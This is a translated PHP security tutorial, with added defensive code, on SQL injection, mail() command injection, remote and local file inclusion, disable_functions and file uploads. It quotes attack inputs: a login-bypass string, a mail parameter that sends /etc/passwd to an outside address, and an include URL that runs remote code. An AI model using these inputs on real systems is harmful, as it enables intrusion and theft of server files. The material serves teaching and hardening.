PHP Security Supplement (PHP Tutorial)

Source: Internet
Author: User
Tags: php, file upload, apache log
Shaun Clowes's article Exploiting Common Vulnerabilities in PHP Applications is very well written and covers many aspects. This article is only a supplement to it, adding some issues it did not mention. It focuses on solving the problems rather than on attacking them.
1. The old trick of spoofing SQL statements
In the default configuration, even if you forget to copy php.ini to /usr/local/lib/php.ini, PHP runs with magic_quotes_gpc=on: the single quote ('), double quote ("), backslash (\) and NUL character (the null byte) in every variable coming from GET/POST/COOKIE are prefixed with a backslash so that the database query works correctly.
However, PHP-4-RC2 introduced a configuration file php.ini-optimized, and in this optimized php.ini magic_quotes_gpc=off. Some administrators, seeing the word "optimized", may copy php.ini-optimized to /usr/local/lib/php.ini, and at that point things become more dangerous. Take a fairly simple validation, assuming none of the necessary characters is filtered:
    SELECT * FROM login WHERE user='$HTTP_POST_VARS[user]' AND pass='$HTTP_POST_VARS[pass]'
We can enter 1' or 1='1 in both the user box and the password box to pass validation. This is a very old method; the statement becomes:
    SELECT * FROM login WHERE user='1' or 1='1' AND pass='1' or 1='1'
Because or 1='1' is true, the check passes.
The best approach is to filter out all unnecessary characters. For GET/POST/COOKIE variables that are used in SQL, it is recommended to apply a custom function:
    // Escape GET/POST/COOKIE data once, whether or not magic_quotes_gpc is on.
    function gpc2sql($str) {
        if (get_magic_quotes_gpc() == 1)
            return $str;            // the runtime already added the backslashes
        else
            return addslashes($str); // escape ' " \ and NUL ourselves
    }
This is mainly so that your program stays safe when ported across different systems.
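The following is an added example, not code from the original article. It shows what the classic 1' or 1='1 input does to the article's query string, how escaping in the style of gpc2sql() neutralises it for a MySQL-style database, and the prepared-statement form that avoids building SQL from strings altogether. It assumes PHP 7+ with PDO and its SQLite driver; the table, the row and the inputs are constructed for the demonstration.

```php
<?php
// Added example, not code from the original article. Requires PHP 7+ with PDO
// and the SQLite driver; the table, row and inputs below are constructed.

// Escape GET/POST/COOKIE data exactly once. get_magic_quotes_gpc() was removed
// in PHP 8, so the call is guarded; on modern PHP this always uses addslashes().
function gpc2sql($str) {
    if (function_exists('get_magic_quotes_gpc') && get_magic_quotes_gpc()) {
        return $str;            // runtime already added the backslashes
    }
    return addslashes($str);    // escapes ' " \ and NUL (MySQL-style escaping)
}

// The vulnerable pattern from the article: raw input interpolated into SQL.
function vulnerable_query($user, $pass) {
    return "SELECT * FROM login WHERE user='$user' AND pass='$pass'";
}

// The same query with each value passed through gpc2sql() first.
function escaped_query($user, $pass) {
    $user = gpc2sql($user);
    $pass = gpc2sql($pass);
    return "SELECT * FROM login WHERE user='$user' AND pass='$pass'";
}

// Prepared statement: values are bound as data and cannot alter the statement.
// Returns the number of matching rows.
function login_rows(PDO $db, $user, $pass) {
    $stmt = $db->prepare('SELECT * FROM login WHERE user = :user AND pass = :pass');
    $stmt->execute([':user' => $user, ':pass' => $pass]);
    return count($stmt->fetchAll(PDO::FETCH_ASSOC));
}

// Constructed in-memory database holding one account.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE login (user TEXT, pass TEXT)');
$db->exec("INSERT INTO login VALUES ('alice', 'correct-horse')");

// The article's input. Printing the two query strings side by side shows how
// the unescaped form gains extra OR branches while the escaped form stays a
// single string literal (the backslash escapes are MySQL syntax, so the escaped
// string is only printed here, not run against SQLite).
$payload = "1' or 1='1";
echo "unescaped: ", vulnerable_query($payload, $payload), "\n";
echo "escaped:   ", escaped_query($payload, $payload), "\n";

// For the live run a text-only variant is used, because SQLite (unlike MySQL)
// does not consider the integer 1 equal to the string '1'.
$live = "1' or '1'='1";
$rows = count($db->query(vulnerable_query($live, $live))->fetchAll(PDO::FETCH_ASSOC));
echo "vulnerable query matched $rows row(s) without a valid password\n";
echo "prepared statement matched ", login_rows($db, $live, $live), " row(s) for the same input\n";
echo "prepared statement matched ", login_rows($db, 'alice', 'correct-horse'),
     " row(s) for the real credentials\n";
```

Run from the command line, the script prints the two query strings, then shows that the string-built query returns the stored account although no password was known, while the prepared statement returns nothing for the same input and one row only for the genuine credentials. Escaping as the article recommends is the right fix for the era it describes; binding parameters removes the problem regardless of the magic_quotes setting.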
2. The fifth parameter of the mail function
In php-4.0.5 the mail function gained a fifth parameter, used to set additional command-line arguments when the message is actually sent. But the special shell command characters are not checked properly, so there is a serious command-execution problem. Take the example from the manual:
    mail("nobody@aol.com", "the subject", $message, "From: webmaster@$SERVER_NAME", "-fwebmaster@$SERVER_NAME");
This is problematic: if $SERVER_NAME is ;mail san@xfocus.org </etc/passwd, the machine's password file is sent to my mailbox.
A reminder here: several of the examples in the PHP manual have security issues. Don't copy them verbatim into real code; they only demonstrate the basic function, and understanding them is enough.
For this mail function problem, the simplest fix is not to use the fifth parameter at all; if you must use it, filter out illegal characters such as (;). Alternatively, modify the PHP source package file ext/standard/mail.c and add the following line before if (extra_cmd != NULL) {:
    extra_cmd = NULL;
and then recompile.
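The following is an added example, not code from the original article: a wrapper around mail() that only ever passes a validated sender to the fifth parameter, and falls back to the four-argument form otherwise. The function names, the field layout and the sample addresses are hypothetical.

```php
<?php
// Added example, not code from the original article. The function names and
// the addresses are hypothetical.

// Return the "-f<address>" argument for a sender address, or null if the address
// contains anything beyond a deliberately narrow character set. The allowlist is
// narrower than RFC 5322 on purpose: this value reaches a shell, so characters
// such as ';', '<', '|', '`' and whitespace must never get through.
function sender_arg($address) {
    if (!is_string($address)
        || !preg_match('/^[A-Za-z0-9._+-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)+$/D', $address)) {
        return null;
    }
    return '-f' . $address;
}

// Send with the envelope sender set only when it validated; otherwise use the
// four-argument form instead of passing tainted data on the sendmail command line.
function send_notice($to, $subject, $body, $sender) {
    $extra = sender_arg($sender);
    if ($extra === null) {
        return mail($to, $subject, $body);
    }
    // The same validated value is safe in the From: header too (no CR/LF possible).
    return mail($to, $subject, $body, 'From: ' . $sender, $extra);
}

// Constructed inputs: an honest value and one shaped like the article's example.
$good = 'webmaster@example.org';
$bad  = ';mail attacker@example.org </etc/passwd';

var_dump(sender_arg($good));   // the -f argument for the honest address
var_dump(sender_arg($bad));    // null: the value never reaches the shell
```

The check is an allowlist rather than a blocklist of characters such as ';', so a value that is not a plain address is rejected as a whole; the article's approach of filtering individual characters works too, but an allowlist does not need updating when another metacharacter is discovered.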
3. The UNIX version of the require and include functions
The Windows version's require and include functions do not support HTTP and FTP remote files, but the UNIX version supports remote include files by default. Whatever the extension of the file, require and include pull it in and execute it as part of the program.
We use many require or include calls when writing programs, for modularity and portability, and sometimes a variable is used as the parameter, for example include("$something");. If the user can control the $something parameter at this point and it is not filtered, the result is disastrous.
First, any file the web user has read permission on can be viewed. Assuming the program is called http://victim/test.php, we can use the URL http://victim/test.php?something=/etc/passwd to view the /etc/passwd file.
Commands can also be executed using the remote file include feature. For example, I put a file test.php on www.xfocus.org with the content:

then I can use the URL http://victim/test.php?something=http://www.xfocus.org/test.php?cmd=uname to run arbitrary commands.
phpMyAdmin has this problem too, and we can use it to view any file we like. But it calls file_exists before the include to check whether the file exists, and file_exists does not support remote files, so the second method above cannot be used directly. We can, however, make Apache log a request URL containing PHP code, so that specifying the Apache log as something also executes commands; but Apache logs are usually large and full of clutter.
The method referred to in http://www.securereality.com.au/sradv00008.txt is more ingenious: the script to be executed is submitted as a file upload, which produces a file with a name like php8ta02i in the server's temporary upload directory. Because that file exists, the file_exists check passes and the script in the uploaded file can be executed.
Therefore you must be careful when using include and require, especially when the file to include is specified by a parameter: the parameter must never be under the user's control. Support for remote files can also be removed by modifying php.ini. Before php-4.0.3 this was done with disable-url-fopen-wrapper; in later versions it is turned off with allow_url_fopen = off.
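The following is an added example, not code from the original article: choosing an include target by allowlist from a fixed directory, so that a user-supplied value never becomes a path or a URL. PAGES_DIR, the page names and the page parameter are hypothetical; the php.ini lines in the comments restate the article's allow_url_fopen setting and add allow_url_include, which exists from PHP 5.2.

```php
<?php
// Added example, not code from the original article. PAGES_DIR, the page names
// and the 'page' parameter are hypothetical.
//
// Pair this with php.ini settings that remove remote includes entirely:
//   allow_url_fopen = Off      (the setting the article names)
//   allow_url_include = Off    (PHP 5.2+; governs include/require of URLs separately)

define('PAGES_DIR', __DIR__ . '/pages');
$allowed_pages = ['home', 'about', 'contact'];   // served from pages/<name>.php

// Map a requested page name to a file under PAGES_DIR, or return null.
function resolve_page($requested, array $allowed) {
    // 1. Exact match against the allowlist: '../', '/etc/passwd', 'http://...'
    //    and NUL bytes cannot get through because the name itself is never a path.
    if (!is_string($requested) || !in_array($requested, $allowed, true)) {
        return null;
    }
    // 2. Defence in depth: resolve symlinks and confirm the file really sits
    //    inside PAGES_DIR, so a stray symlink in that directory cannot escape it.
    $base = realpath(PAGES_DIR);
    $path = realpath(PAGES_DIR . '/' . $requested . '.php');
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $path;
}

$requested = $_GET['page'] ?? 'home';
$file = resolve_page($requested, $allowed_pages);
if ($file === null) {
    http_response_code(404);
    exit('No such page');
}
include $file;     // the file was chosen by the program, not by the request
```

The allowlist does the real work; the realpath check only confirms that the resolved file is where the program expects, which also catches a misconfigured PAGES_DIR. Note that a request such as ?page[]=home arrives as an array, which the is_string check rejects before it can reach in_array.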
4. disable_functions
php-4.0.1 introduced the disable_functions directive in php.ini, which is useful and can be used to forbid certain functions. For example, add disable_functions = passthru, exec, system, popen to php.ini; when these functions are called you will only get the prompt "Warning: system() has been disabled for security reasons".
Alas, this does not mean there is no way to execute a system command, because PHP borrows many Perl features, such as executing commands with backticks (`):
    <?php
    $output = `ls -al`;   // backticks run the command through the shell
    echo "
    $output
    ";
    ?>
This can only be avoided by setting safe_mode, but the hateful safe_mode is too restrictive and makes other things somewhat inconvenient.
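The following is an added example, not code from the original article: it reads the running interpreter's disable_functions list and reports which command-execution entry points remain callable. The php.ini lines in the comments are illustrative, and the observation that the backtick operator is implemented by shell_exec(), so disabling shell_exec() also disables backticks, comes from the PHP manual rather than from the article.

```php
<?php
// Added example, not code from the original article. The php.ini lines below
// are illustrative, not the article's.
//
//   Article's setting (backticks still work, because they are implemented by
//   shell_exec(), which is not in the list):
//     disable_functions = passthru,exec,system,popen
//   Hardened setting (disabling shell_exec also disables the backtick operator):
//     disable_functions = passthru,exec,system,popen,shell_exec,proc_open,pcntl_exec

// Functions that hand a string to a shell or spawn a process.
const EXEC_FUNCTIONS = ['passthru', 'exec', 'system', 'popen',
                        'shell_exec', 'proc_open', 'pcntl_exec'];

// Return the disable_functions setting as a normalised list of names.
function disabled_functions() {
    $raw = strtolower((string) ini_get('disable_functions'));
    return preg_split('/[\s,]+/', $raw, -1, PREG_SPLIT_NO_EMPTY);
}

// Return the entries of $wanted that are NOT disabled.
function still_enabled(array $wanted) {
    $disabled = disabled_functions();
    $open = [];
    foreach ($wanted as $fn) {
        if (!in_array(strtolower($fn), $disabled, true)) {
            $open[] = $fn;
        }
    }
    return $open;
}

$open = still_enabled(EXEC_FUNCTIONS);
if ($open === []) {
    echo "all listed execution functions are disabled\n";
} else {
    echo 'still enabled: ', implode(', ', $open), "\n";
    if (in_array('shell_exec', $open, true)) {
        echo "note: the backtick operator is also usable, since it calls shell_exec()\n";
    }
}
```

Run under the article's four-entry setting, the script lists shell_exec, proc_open and pcntl_exec as still enabled and flags the backtick operator; under the hardened line it reports everything disabled. Reading ini_get('disable_functions') is deliberate: it reflects the configuration the web server actually loaded, which may differ from the php.ini you edited.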
5. File Upload
The PHP file upload problem has been described very clearly in http://www.securereality.com.au/sradv00001.html. This is indeed a fairly serious problem: generally the files we want to upload are placed in the web directory, so it is easy for an attacker to obtain any file the system's web user can read.
Fortunately, the is_uploaded_file and move_uploaded_file functions were provided after php-4.0.3. So upload programs on php-4.0.3 and above must not use the copy function; use move_uploaded_file instead, which checks whether the file was really uploaded. For php-4.0.2 and below, it is recommended to add a function before the copy:
    // Replacement for is_uploaded_file() on PHP 4.0.2 and below: true only if
    // $filename lives in the upload temp directory (ereg_replace is PHP 4 era).
    function is_uploaded_file($filename) {
        if (!$tmp_file = get_cfg_var('upload_tmp_dir')) {
            $tmp_file = dirname(tempnam('', ''));
        }
        $tmp_file .= '/' . basename($filename);
        /* User might have trailing slash in php.ini ... */
        return (ereg_replace('/+', '/', $tmp_file) == $filename);
    }
This vulnerability has been on Security Focus for a long time; it is just that there are usually a lot of validation and conditional statements before the copy, which makes the attack quite difficult, hehe.
Also, do not use environment variables, cookie variables, session variables and so on as life-or-death criteria, because these variables are far too easy to forge.
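The following is an added example, not code from the original article: an upload handler built on is_uploaded_file() and move_uploaded_file() instead of copy(), which stores files outside the web root under a server-chosen name so that an uploaded file can neither be fetched from the web directory nor executed. UPLOAD_DIR, the form field name userfile and the extension list are hypothetical; it assumes PHP 7+ for random_bytes().

```php
<?php
// Added example, not code from the original article. UPLOAD_DIR, the form
// field name 'userfile' and the extension list are hypothetical; PHP 7+ assumed.

define('UPLOAD_DIR', '/var/app/uploads');     // deliberately NOT under the document root
const ALLOWED_EXT = ['png', 'jpg', 'jpeg', 'gif', 'txt'];

// Validate one $_FILES entry and store it. Returns [true, stored_path] or [false, reason].
function store_upload(array $file, array $allowed_ext) {
    if (!isset($file['error']) || $file['error'] !== UPLOAD_ERR_OK) {
        return [false, 'upload failed or missing'];
    }
    // Only a file PHP itself received in this POST passes; a path such as
    // /etc/passwd smuggled in as tmp_name does not.
    if (!is_uploaded_file($file['tmp_name'])) {
        return [false, 'not an uploaded file'];
    }
    // The extension is checked against an allowlist; the client-supplied name
    // is otherwise ignored.
    $ext = strtolower(pathinfo($file['name'], PATHINFO_EXTENSION));
    if (!in_array($ext, $allowed_ext, true)) {
        return [false, 'file type not allowed'];
    }
    // Server-chosen name, so no user input reaches the filesystem path.
    $dest = UPLOAD_DIR . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
    // move_uploaded_file() repeats the is_uploaded_file() check before moving.
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        return [false, 'could not store file'];
    }
    chmod($dest, 0640);    // readable by the application, not executable, not world-readable
    return [true, $dest];
}

if ($_SERVER['REQUEST_METHOD'] === 'POST' && isset($_FILES['userfile'])) {
    list($ok, $info) = store_upload($_FILES['userfile'], ALLOWED_EXT);
    echo $ok ? "stored as $info\n" : "rejected: $info\n";
}
```

Keeping the files out of the document root addresses the article's main concern directly: even a file that slips through the extension check is never reachable as a URL, and a script has to hand it back explicitly, which is where access control belongs.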
Hehe, I have more things at hand; I'll add the rest as I think of it, and other comrades are welcome to add or change anything freely.
Reference documents
1. PHP 4 ChangeLog (http://www.php.net/ChangeLog-4.php)
2. A Study in Scarlet: Exploiting Common Vulnerabilities in PHP Applications (http://www.securereality.com.au/studyinscarlet.txt) and analysist's translation.
3. Remote command execution vulnerabilities in phpMyAdmin and phpPgAdmin (http://www.securereality.com.au/sradv00008.txt)
